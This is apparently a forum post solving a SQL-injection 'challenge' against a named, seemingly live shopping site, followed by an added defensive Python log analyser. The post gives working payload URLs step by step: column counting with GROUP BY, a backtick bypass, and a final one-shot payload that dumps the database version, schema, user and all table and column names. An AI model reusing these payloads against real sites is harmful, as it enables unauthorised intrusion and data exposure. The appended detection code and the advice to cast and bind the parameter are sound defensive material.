- SA - EZ SQLi Challenge {SOLUTION}
- CHALLENGE:
- Site: http://comforthomesolution.com/product.php?c=11
- Level: ez as fuck (for real this time HAHAHAHA but kinda tricky hihi)
- Tasks:
- -Union based only (don't use other fucking methods)
- -Print your name, version, db, user, tables and columns
- Rules: (not too many for now hihi)
- -Thou shall not use version(), @@version in printing the version
- -Thou shall not use user(), @@user, current_user in printing the user
- -Thou shall not use database() in printing the database
- -PM me your query to be in the solvers list
- SOLUTION:
- First of all, we need to close the original query using ")" so that it doesn't interfere with our query.
- We can easily get the number of columns using the GROUP BY clause :)
- http://comforthomesolution.com/product.php?c=11)+group+by+1--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+2--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+3--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+4--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+5--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+6--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+7--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+8--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+9--+ <- fuck bro, at last an error!!!
- Okay, so now we know there are only 8 columns. So let's try it boiz!
- http://comforthomesolution.com/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8--+
- Wtf, what happened, why is it like that? Nothing showed up, fuck this shit :( (That's mostly the error you ran into, right? It's because of the SQL statements inside the site we're injecting into (column condition shits).)
- To bypass it and ignore the c_cat.id etc., we'll use the holy backtick "`", or "%60" when it's URL-encoded.
- Now let's try it!
- http://comforthomesolution.com/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8`--+
- Ehmerged, the vuln columns showed up woo!!! We can now DIOS (dump in one shot) the site, so this will be the final query.
- http://comforthomesolution.com/product.php?c=11) union select 1,concat(@@global.version,0x3a3a53696c656e74416e67656c3c62723e44617461626173653a3a,schema(),0x3c62723e557365723a3a,system_user(),concat(@c:=0x00,if((select+count(*)+from+information_schema.columns+where+table_schema=database()+AND+@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)),3,4,5,6,7,8`
- Hope you learned something :))
- Btw, I'm planning to create a YouTube channel too in the near future so stay tuned folks!
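
From the defender's side, every step above leaves a recognisable request in the web server's access log. The Python below is an added example, not part of the original paste: the function name, finding labels and sample entries are constructed, and it assumes the `c` parameter normally carries only an integer id.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Patterns for the request shapes in this write-up, applied after URL-decoding.
SIGNATURES = {
    "by_ordinal": re.compile(r"\b(?:group|order)\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "metadata_read": re.compile(
        r"information_schema|@@[\w.]+|\b(?:schema|system_user)\s*\(", re.I),
    "trailing_backtick": re.compile(r"`\s*(?:--\s*)?$"),
}
ORDINAL = re.compile(r"\b(?:group|order)\s+by\s+(\d+)", re.I)


def analyze(entries, numeric_params=("c",)):
    """Map each client to its sorted findings, given (client, request_target) pairs."""
    findings, ordinals = defaultdict(set), defaultdict(set)
    for client, target in entries:
        # parse_qsl decodes '+' to a space and %60 to a backtick before matching
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            # Assumption: the listed parameters only ever carry an integer id
            if name in numeric_params and not value.strip().isdigit():
                findings[client].add("non_numeric_id")
            for label, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings[client].add(label)
            ordinals[client].update(int(n) for n in ORDINAL.findall(value))
    for client, seen in ordinals.items():
        # Three or more consecutive ordinals from one client: column counting
        if len(seen) >= 3 and max(seen) - min(seen) + 1 == len(seen):
            findings[client].add("column_enumeration")
    return {client: sorted(found) for client, found in findings.items()}


# Constructed sample: documentation-range IPs, targets shaped like the steps above.
SAMPLE = [
    ("198.51.100.20", "/product.php?c=11"),
    ("203.0.113.7", "/product.php?c=11)+group+by+7--+"),
    ("203.0.113.7", "/product.php?c=11)+group+by+8--+"),
    ("203.0.113.7", "/product.php?c=11)+group+by+9--+"),
    ("203.0.113.7", "/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8%60--+"),
    ("203.0.113.7", "/product.php?c=11)+union+select+1,schema(),3,4,5,6,7,8%60"),
]

if __name__ == "__main__":
    for client, found in analyze(SAMPLE).items():
        print(client, found)
```

The `non_numeric_id` finding is the cheapest signal of the set, and the same check applied in the application (reject or cast `c` to an integer, then bind it as a query parameter) closes the injection point altogether.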